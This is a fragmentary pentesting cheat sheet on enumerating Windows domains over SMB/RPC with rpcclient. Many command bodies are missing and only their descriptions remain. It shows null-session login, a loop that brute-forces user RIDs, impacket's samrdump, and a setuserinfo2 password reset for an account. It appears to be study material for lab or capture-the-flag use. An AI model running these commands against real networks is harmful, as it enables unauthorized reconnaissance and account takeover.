rpcclient -U '' -N 10.10.10.10
rpcclient -U 'qu35t' 10.10.10.10
List all users.
Get informations from a user.
List all groups.
Get informations from a group.
Show members of a group.
List all domains.
Get informations from a domain.
List all shares.
Get share informations.
netsharegetinfo notes
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
Brute forcing user RIDs.
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
With an impacket script.
samrdump.py 10.10.10.10
setuserinfo2 'qu35t' 23 'NewPassw0rd!'